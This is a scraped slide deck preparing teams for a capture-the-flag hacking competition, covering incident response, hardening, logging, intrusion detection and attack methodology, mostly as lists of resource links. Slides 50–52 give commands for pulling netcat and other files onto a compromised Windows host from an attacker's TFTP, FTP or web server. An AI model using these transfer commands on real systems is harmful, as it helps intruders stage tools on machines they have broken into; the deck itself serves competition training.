cloud_computing_Infrastucture_as_cloud_p
mainakbhattacharya20
 
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
A Presentation on Touch Screen Technology
memembruh336
 
A novel scalable deep ensemble learning framework for big data classification...
IAESIJAI
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
Zenith AI: Advanced Artificial Intelligence
Biz Preneurs
 
Mushroom cultivation and it's methods.pdf
mailmeonrishi
 
Hindi spoken digit analysis for native and non-native speakers
IAESIJAI
 
Chapter 5: Probability Theory and Statistics
RandyFin
 
Heart disease approach using modified random forest and particle swarm optimi...
IAESIJAI
 
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
TLE Review Electricity (Electricity).pptx
JayPolicarpio2
 

Getting ready for a Capture The Flag Hacking Competition

  • 1. Strategic Security, Inc. © http://www.strategicsec.com/ Preparing For The Strategic Security CTF Presented By: Joe McCray joe@strategicsec.com http://www.linkedin.com/in/joemccray http://twitter.com/j0emccray
  • 2. Strategic Security, Inc. © http://www.strategicsec.com/ Generic CTF Prep CTF Overview • What Is A CTF? • Generic CTF Prep • Strategic Security Specific CTF Prep • Incident Response • System Hardening • System Logging • Intrusion Detection System • Attacking Systems • Maintaining Access
  • 3. Strategic Security, Inc. © http://www.strategicsec.com/ What is A CTF?
  • 4. Strategic Security, Inc. © http://www.strategicsec.com/ What Is A CTF? According to Wikipedia: http://en.wikipedia.org/wiki/Capture_the_flag In computer security, Capture the Flag (CTF) is a computer security competition. CTF contests are usually designed to serve as an educational exercise to give participants experience in securing a machine, as well as conducting and reacting to the sort of attacks found in the real world. Reverse-engineering, network sniffing, protocol analysis, system administration, programming, and cryptanalysis are all skills which have been required by prior CTF contests at DEF CON. There are two main styles of capture the flag competitions: attack/defense and jeopardy.
  • 5. Strategic Security, Inc. © http://www.strategicsec.com/ What Is A CTF?…(cont.) According to Wikipedia: http://en.wikipedia.org/wiki/Capture_the_flag Jeopardy style competitions usually involve multiple categories of problems, each of which contains a variety of questions of different point values. Teams race to be the first to solve the most number of points, but do not directly attack each other.
  • 6. Strategic Security, Inc. © http://www.strategicsec.com/ What Is A CTF?…(cont.) According to Wikipedia: http://en.wikipedia.org/wiki/Capture_the_flag In an attack/defense style competition, each team is given a machine (or a small network) to defend on an isolated network. Teams are scored on both their success in defending their assigned machine and on their success in attacking other team's machines. Image from: http://ctf.itsec.rwth-aachen.de/vpn/
  • 7. Strategic Security, Inc. © http://www.strategicsec.com/ What Is A CTF?…(cont.) According to Wikipedia: http://en.wikipedia.org/wiki/Capture_the_flag Depending on the nature of the particular CTF game, teams may either be attempting to take an opponent's flag from their machine or teams may be attempting to plant their own flag on their opponent's machine. Image from: http://ctf.itsec.rwth-aachen.de/vpn/
  • 8. Strategic Security, Inc. © http://www.strategicsec.com/ Generic CTF Prep
  • 9. Strategic Security, Inc. © http://www.strategicsec.com/ Generic CTF Prep Jeopardy Style CTF Prep Similar to preparing for the TV Show Jeopardy: http://ken-jennings.com/faq • Really hard to cram for so hit the common trivia stuff • Hacker history • High profile attacks/vulnerabilities • Hacker movies • Skip the protocol/programming stuff – either you know it or you don’t Network Attack/Defense Prep • Download all patches for common OSs, or build your own repos • Organize your incident response tools • Have trusted binaries for most common Oss • Organize your exploitation/post-exploitation tools/scripts
  • 10. Strategic Security, Inc. © http://www.strategicsec.com/ Strategic Security CTF Prep
  • 11. Strategic Security, Inc. © http://www.strategicsec.com/ Strategic Security CTF Prep Step 1: Start with the basics • Verify that the place you will be playing from has fast/stable internet • Verify that the network that you will be playing from is secure/safe • Create a separate subnet for yourself (cheap router) • Turn off or firewall all of the other computers in your subnet • Make sure no one else is using your subnet during the game • Verify that the attack workstation/Virtual Machine you will be using has at least 2GB of RAM • Verify that the defensive server has at least 4GB of RAM • Download/Install the latest version of VMWare Workstation or Player
  • 12. Strategic Security, Inc. © http://www.strategicsec.com/ Strategic Security CTF Prep Step 2: Get Your Team Organized • Set up a means for your team to interactively communicate in real time • Google Hangout, Skype, IRC, etc • Set up a means for your team to share resources (docs, tools, etc) • Google Hangout, Google Docs, Sharepoint, Wiki • Understand that some teammates may be in different timezones • Break your team up by function(s) • Attackers • Defenders • Systems Administrators • Researchers
  • 13. Strategic Security, Inc. © http://www.strategicsec.com/ Strategic Security CTF Prep Step 2: Get Your Team Organized (Cont.) • Players that do not have a team will be placed on teams by Thursday 5 Dec. • Get your new teammates integrated quickly • Job role(s) • Access to team resources • Get everyone’s tools, scripts together and try to get them documented so team members can know how to use them and more importantly what they look like to your defensive mechanisms
  • 14. Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response
  • 15. Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response Step 3: Prepare For Incident Response • The first critical skill required of this game will be incident response • Your system will be backdoored • Your system will be rootkited • Your system will be loaded with vulnerabilities • Everything from weak passwords, to custom buffer overflows Required Incident Response Skills • Your team will have to be able to quickly find and remove backdoors • Your team will have to be able to quickly find and remove rootkits
  • 16. Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 1: List all running processes) • GUI Tools • Task Manager • Process Explorer: • http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx • Command-line Tools • Tasklist Command: • http://technet.microsoft.com/en-us/library/bb491010.aspx • PsList: • http://technet.microsoft.com/en-us/sysinternals/bb896682.aspx
  • 17. Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 2: Identify malicious processes) • Look up every process that is running to see if it is legitimate • Resources: • http://www.fileresearchcenter.com/ • http://www.neuber.com/taskmanager/process/index.html • http://www.liutilities.com/products/wintaskspro/processlibrary/ • Of course Google!
  • 18. Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 3: Kill all malicious processes) • GUI Tools • Task Manager • Process Explorer: • http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx • Command-line Tools • Taskkill Command: • http://technet.microsoft.com/en-us/library/bb491009.aspx • PsKill • http://technet.microsoft.com/en-us/sysinternals/bb896683.aspx
  • 19. Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 4: Find All Malicious Connections) • TCPView (GUI Tool): • http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx • Netstat Command: • http://windowsitpro.com/windows/using-netstat-get-list-open-ports • https://isc.sans.edu/forums/diary/Fun+With+Windows+Netstat/1911 • http://computer-networking.wonderhowto.com/how-to/detect-hackers-with-netstat-262222/ • http://www.dti.ulaval.ca/webdav/site/sit/shared/Librairie/di/operations/informatique/windows/netstat_results.htm • During the game – take note of your teammates’ IP addresses • If there is an IP that doesn’t belong to your teammates connected to your server – that is probably an attacker from another team and you should kill that connection
  • 20. Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 5: Kill All Malicious Connections) • TCPView (GUI Tool): • http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx • Taskkill Command • wKillcx • http://wkillcx.sourceforge.net/
  • 21. Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 6: Find Malicious Services) • References: • http://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a- service/ • http://www.addictivetips.com/windows-tips/smartly-analyze-windows- local-services-for-malware-rootkits-more/ • http://reverseengineering.stackexchange.com/questions/2019/debuggin g-malware-that-will-only-run-as-a-service
  • 22. Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 7: Find Rootkits) • References: • http://www.computerweekly.com/feature/Rootkit-and-malware- detection-and-removal-guide
  • 23. Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response Resources Good Technical Incident Response Resources • References: • http://www.slideshare.net/pmelson/malware-analysis-made-simple-presentation • http://computer-forensics.sans.org/summit-archives/DFIR_Summit/Finding-Malware-Like-Iron-Man-Corey-Harrell.pdf
  • 24. Strategic Security, Inc. © http://www.strategicsec.com/ What Are We Covering Today Today We Will Be Covering • What Is A CTF? • Generic CTF Prep • Strategic Security Specific CTF Prep • Incident Response • System Hardening • System Logging • Intrusion Detection Systems • Attacking Systems • Maintaining Access
  • 25. Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening
  • 26. Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening The Methodology (Step 1: Create Hardening Checklists) • STIG • http://iase.disa.mil/stigs/ • Hardening Guides • http://www.nsa.gov/ia/mitigation_guidance/security_configuration_guides/operating_systems.shtml • https://secure.ericade.net/security/index.php/Windows_Hardening_Guide • https://benchmarks.cisecurity.org/downloads/benchmarks/ • Generic Hardening Resources • http://www.xmarks.com/topic/server_hardening
  • 27. Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening The Methodology (Step 2: Organize Your Tools and Scripts) • MBSA • http://www.microsoft.com/en-us/download/details.aspx?id=7558 • Benchmark Assessment Tools • http://benchmarks.cisecurity.org/downloads/audit-tools/
  • 28. Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening The Methodology (Step 3: Focus on Scripting) • Scripting For Security • http://www.sans.org/reading-room/whitepapers/scripting • http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html • http://technet.microsoft.com/en-us/scriptcenter/dd742377.aspx • http://www.sans.org/reading-room/whitepapers/auditing/simple-windows-batch-scripting-intrusion-discovery-33193 • Interesting Book I Came Across Today • http://www.amazon.com/Perl-Scripting-Windows-Security-Monitoring/dp/159749173X • Haven’t read it • Don’t know the author • But looks interesting and may help with this game
  • 29. Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening The Methodology (Step 4: Focus on Continuous Monitoring) • Be conscious of the potential skill of the attackers • Consider yourself breached at all times during the game IMPORTANT • Throughout the game be sure to constantly verify that your security configurations have not changed
  • 30. Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening The Methodology (Step 1: Create Hardening Checklists) • Stigs • http://iase.disa.mil/stigs/ • Hardening Guides • http://www.nsa.gov/ia/mitigation_guidance/security_configuration_guides/operating_systems.shtml • https://secure.ericade.net/security/index.php/Windows_Hardening_Guide • https://benchmarks.cisecurity.org/downloads/benchmarks/ • Generic Hardening Resources • http://www.xmarks.com/topic/server_hardening • Blah
  • 31. Strategic Security, Inc. © http://www.strategicsec.com/ System Logging
  • 32. Strategic Security, Inc. © http://www.strategicsec.com/ System Logging The Methodology (Step 1: Understand Windows Logging) • Windows Logging Basics • http://www.windowsecurity.com/articles- tutorials/windows_os_security/Understanding_Windows_Logging.html • http://www.sans.org/security-resources/idfaq/logging-windows.php • http://en.wikipedia.org/wiki/Event_Viewer • Event ID Listings • http://www.eventid.net/ • http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx
  • 33. Strategic Security, Inc. © http://www.strategicsec.com/ System Logging The Methodology (Step 2: Organize Log Analysis Tools) • Free Tools • http://www.microsoft.com/en-us/download/details.aspx?id=24659 • http://www.lizard-labs.net/log_parser_lizard.aspx • http://visuallogparser.codeplex.com/ • Learn To Use Log Parser and Log Parser Lizard • http://computer-forensics.sans.org/blog/2011/02/10/computer-forensics-howto-microsoft-log-parser • Take it to the next level with Splunk • https://www.sans.org/reading-room/whitepapers/logging/setting-splunk- event-correlation-home-lab-34422
  • 34. Strategic Security, Inc. © http://www.strategicsec.com/ System Logging The Methodology (Step 3: Organize Important Queries) • Good queries to run: • http://aggressivevirusdefense.wordpress.com/2010/04/23/log-parser/ • http://www.codinghorror.com/blog/2005/08/microsoft-logparser.html
  • 35. Strategic Security, Inc. © http://www.strategicsec.com/ System Logging The Methodology (Step 4: Set Up Automated Tasks) • Windows Automation Basics • http://www.techradar.com/us/news/software/applications/how-to- automate-tasks-in-windows-1107254 • http://www.iopus.com/guides/winscheduler.htm • http://stackoverflow.com/questions/6933698/automate-services-restart- in-windows-server-2003
  • 36. Strategic Security, Inc. © http://www.strategicsec.com/ Intrusion Detection Systems
  • 37. Strategic Security, Inc. © http://www.strategicsec.com/ Intrusion Detection Systems The Methodology (Step 1: Start With The Basics) • Do you have the resources to run an IDS? • VMWare Workstation or ESXi (recommended) • At least 2GB of RAM to allocate to the IDS • Run on the same host machine as your team server (eases network configuration issues) • Are you willing to build it/debug it now? • Probably want a full day or 2 to just to play around with it if this is your first time • Run attacks with metasploit and get a feel of what alerts look like and how fast they come in
  • 38. Strategic Security, Inc. © http://www.strategicsec.com/ Intrusion Detection Systems The Methodology (Step 2: Decide What To Deploy) • Lots of IDSs to choose from • Network Based • Snort http://snort.org/ • Suricata http://www.openinfosecfoundation.org/index.php/download-suricata • Bro http://www.bro.org/ • Host-Based • OSSEC http://www.ossec.net/
  • 39. Strategic Security, Inc. © http://www.strategicsec.com/ Intrusion Detection Systems The Methodology (Step 2: Decide What To Deploy - Cont) • Network based IDS are good, but are highly prone to false positives • Host-Based IDS are great, but require something running on the host • The best option is to combine the two IDS types, but that can be a lot of work • The problem with deploying both of them is that it can be a lot of work
  • 40. Strategic Security, Inc. © http://www.strategicsec.com/ Intrusion Detection Systems The Methodology (Step 3: Deploy with bang for buck in mind) • Use something that gives you the most bang for your buck (tools/features) • Use something that you can build quickly • My Recommendations: • Security Onion: http://blog.securityonion.net/p/securityonion.html • OSSIM: http://www.alienvault.com/open-threat-exchange/projects
  • 41. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems
  • 42. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 1: Attack Yourself First) • Don’t tip your hat to other teams by researching on their servers • Create a copy (clone) of your team server • This will allow attackers to develop working attacks for the server • Run all security tools (Nessus/Metasploit) against your clone server • http://www.slideshare.net/dc612/dc612-hands-on-penetration-testing-101-presentation-final • http://www.slideshare.net/kozmaa/the-best-defense-is-a-good-offense-april-2013 • Create a list of attacks that work against your server
  • 43. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 2: Create Click Scripts) • Organize your attacks into click scripts • Shell Scripts • Batch Scripts • MSF CLI Scripts • Have a war chest of mad kung fu
  • 44. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 2: Create Click Scripts…cont.) • Start with shell scripts • Tutorials: • http://www.danscourses.com/Network-Penetration-Testing/bash-line-commands-a-shell-scripting.html • http://www.gnucitizen.org/blog/you-dont-need-the-ultimate-pen-testing-framework/ • http://www.commonexploits.com/lazymap-lazy-nmap-scanning-script/ • Videos: • http://www.youtube.com/watch?v=GPjcSxyIIUc
  • 45. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 2: Create Click Scripts…cont.) • Pentester Shell Script Resources • https://github.com/leebaird/discover • http://www.pentesterscripting.com/ • http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html • https://www.sans.org/reading-room/whitepapers/auditing/admins-documentation-hackers-pentest-33303
  • 46. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 2: Create Click Scripts…cont.) • Pentester Windows Scripting Resources • http://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf • http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html • https://chapters.theiia.org/lansing/Documents/Command%20Line%20Basics%20for%20IT%20Auditors.pdf • https://isc.sans.edu/diary/Windows+Command-Line+Kung+Fu+with+WMIC/1229 • http://www.sans.org/reading-room/whitepapers/scripting/windows-script-host-hack-windows-33583 • http://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
  • 47. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 2: Create Click Scripts…cont.) • Step Up To MSFCLI • http://www.offensive-security.com/metasploit-unleashed/Msfcli • http://www.youtube.com/watch?v=Jt6ynMun8Tk
  • 48. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 3: Have a War Chest Close By) • I think I’ve got a script for that…. • https://www.sans.org/reading-room/whitepapers/auditing/admins-documentation-hackers-pentest-33303 • http://www.rmccurdy.com/scripts/fu.txt
  • 49. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files) • There is no more critical offensive skill • Native • TFTP • FTP • VBS Script • In-line file transfer (debug.exe) • Bitsadmin • Powershell • Tools • Netcat Clones • Meterpreter Upload
  • 50. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files…cont.) • TFTP • Make sure your attacker machine is running a TFTP Server • On compromised host command prompt type: • tftp -i TFTP-Server-IP GET nc.exe c:nc.exe
  • 51. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files…cont.) • FTP • Make sure your attacker machine is running an FTP Server • Remember a hacked command prompt can not run interactive commands. • You will need to run an ftp script to pull this off: • On compromised host command prompt type: • echo user strategicsec strategicsec > c:ftp.txt • echo bin >> c:ftp.txt • echo get nc.exe update.exe >> c:ftp.txt • echo quit >> c:ftp.txt • ftp -n -s:c:ftp.txt FTP-Server-IP • del c:ftp.txt
  • 52. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files…cont.) • VBS Script • Make sure your attacker machine is running a web Server • http://www.wsec.be/blog/2009/07/20/pure-vbs-downloader-with-proxy-support • On compromised host command prompt echo in every line of the vbs file: • echo strUrl = WScript.Arguments.Item(0) >> vbs_download.vbs • echo StrFile = WScript.Arguments.Item(1) >> vbs_download.vbs • . • . • echo Next >> vbs_download.vbs • echo ts.Close >> vbs_download.vbs • cscript vbs_download.vbs http://WebServer-IP/file.txt file.txt
  • 53. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files…cont.) • In-Line File Transfer (debug.exe method) • Make sure your attacker machine is running a web Server • http://ow.ly/rE9UH • http://rhysmossom.com/2013/07/01/mssql-fileupload-autohack/ • http://www.blackhat.com/presentations/bh-dc-10/Bannedit/BlackHat-DC-2010-Bannedit-Advanced-Command-Injection-Exploitation-1-wp.pdf • On compromised host command paste in hex opcode.
  • 54. Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files…cont.) • Win7 and higher tricks (other stuff may be disabled) • http://www.greyhathacker.net/?tag=download-and-execute • The link covers the following methods • Vbs • wsh • Bitsadmin • Powershell
  • 55. Strategic Security, Inc. © http://www.strategicsec.com/ Contact Me.... Toll Free: 1-844-458-1008 Email: joe@strategicsec.com Twitter: http://twitter.com/j0emccray LinkedIn: http://www.linkedin.com/in/joemccray